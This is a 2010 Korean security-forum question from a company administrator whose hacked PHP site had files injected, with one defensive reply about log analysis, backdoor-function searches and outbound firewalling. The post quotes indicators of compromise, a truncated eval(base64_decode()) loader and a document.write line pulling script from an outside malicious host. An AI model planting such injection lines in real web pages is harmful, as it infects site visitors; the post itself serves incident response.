크래킹 피해

423,

3/22

basscraft

백도어 관련 문의

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=473 [복사]

회사에서 호스팅하고 있는 서버에 해킹을 당해서
소스가 엉망이 되었습니다.

거의 10년 전쯤 php로 개발된 사이트입니다.
OS는 리눅스 입니다.

확인해 보니 php 파일 맨 처음에

<?php eval(base64_decode('aWYoIWZ1b... 생략...XSkpOw==')); ?>

이런 소스가 인젝션되어 있었습니다.
find 명령으로 'eval(base64_decode(' 문자열을 포함한 소스를 찾아보았더니
폴더별로 index.php 또는 index*.php 등 파일들에 인젝션되어 있습니다.

추가로 .js, .html 파일들에도

document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>');
document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>')
;document.write('<script src=http://chefs.yoursecretchefs.com/images/gifimg.php ><\/script>');

이런 내용들이 주입되어 있습니다.
관리를 제대로 못하고 있어서 소스도 백업이 안된 상태 -0-;;;;
노가다라도 일일히 찾아서 지우면 되겠지만

문제는 인젝션된 소스중 일부는 중간부분 이후 소스가 뭉텅 잘려버린 것들이 존재해서
복구가 불가능한 상태입니다.(오래된 소스를 찾아서 복구하고 있는중...)
복구를 다 한다고 해도 백도어 같은게 존재해서 또다시 들어올 것 같아서

어느사이트에서 본 확인 방법으로 확인해 보니

[aaa@xxx dev]$ find /dev -type f -exec ls -l {} \;
-rw-r--r-- 1 root root 196608 2월 27 04:47 /dev/.udev.tdb

이런 결과가 있습니다.
저게 백도어 맞는지...

당장 다시 설치하고 싶지만
일단 이번 문제만 어떻게 넘기고
사이트 리뉴얼을 하기로 잠정 합의된 상태입니다.

조언좀 부탁드립니다.

1. 추측되는 해킹의 방법
2. 해킹의 목적 예상되는 피해(회사 내, 외부)
3. 소스 복구시 유의할 점
4. 백도어 제거 및 시스템 정상화에 대한 조언

질문이 너무 많습니다만...
개별 항목이라도 답변주시면 복받으실 껍니다 ^^

Hit : 4874 Date : 2010/03/03 10:00


멍멍	1. 위 정보만으로는 추측하기 힘드나 주로 웹해킹이 많습니다. 파일이 변경된 시간에 해당하는 웹 로그를 분석해 보세요. 2. Script가 삽입된 것으로 보아 추가적인 Client 장악 시도가 예상됩니다. IE 브라우져위 취약점을 이용하여 웹 사이트를 방문하는 다른 Windows 사용자들을 추가 장악하는 것을 말합니다. 3. eval 외에도 system, exec, passthru, popen 함수 또한 백도어로 사용 가능하니 함께 검색해보세요 4. 크래킹을 야기한 취약점을 찾지 못하면 복구 후에도 재감염 될 가능성이 높습니다. Script를 심는 패턴은 웜(자동 공격)에 의한 공격일 가능성이 크기 때문입니다. iptables를 이용한 방화벽 정책 설정 또한 공격 방어에 도움이 될 것입니다. (outbounding -안에서 밖으로 나가는- 패킷 차단 등) 5. 답변 안 하면 복 못 받는건가요? ^^	2010/03/09

383

Win-Trojan/Downloader.8192.BJ[ntsys.exe][3]

nm108

12/06

4961

382

아시는분 알려주세여....넷버스 1.7

해커달타냥

10/27

4941

381

형님들 netstat해서 8080뜨는데어케요 포맷도햇는데[14]

anmgod

02/22

4924

380

여자친구의 주민번호를 도용당한거 같습니다.[14]

simva7

09/16

4906

379

쿠키를 가지고 해킹을 하는 법이 있다고 들었는데...[7]

bass223

11/18

4894

378

C:\Temp 에 있는 CMS.db3 파일 머죠?[2]

wlals813

06/05

4887

백도어 관련 문의[1]

basscraft

03/03

4873

376

누군가가 제 이메일을 훔쳐보는거 같은데....[5]

153com

01/18

4867

375

제가 여기서 만화 보고있는데 어떤 미국인 두명이서 이야기하고있었습니다...[9]

박태호

07/05

4865

374

도와주세요.[2]

sdc04303

05/07

4855

373

해킹한다고 문자가 왔는데요[9]

yakida1940

10/03

4845

372

누킹 질문이요[1]

tjdqhr35

11/16

4824

371

keyhook에대해서[3]

dgesc217

02/13

4765

370

엉뚱한짓하다가 망했어염 헬프미 플리스..흑흑[4]

해커달타냥

10/18

4677

369

디도스 공격시 아이피 차단 관련 질문드립니다.[8]

jungjae5

12/19

4675

368

도움이 필요합니다. 꼭 읽어주시고 도움부탁드려요.[4]

최민주

06/23

4671

367

프로렛해킹중고장질문이요[1]

tolta

01/16

4657

366

넷복 만들기 ?[16]

gns8701

11/19

4654

365

넷봇해킹..[9]

dbswlgnscjsw

03/18

4644

364

ftp해킹 당한거 같은데 가능한 일인지요??[4]

ssamssam04

07/19

4630

[1][2] 3 [4][5][6][7][8][9][10]..[22]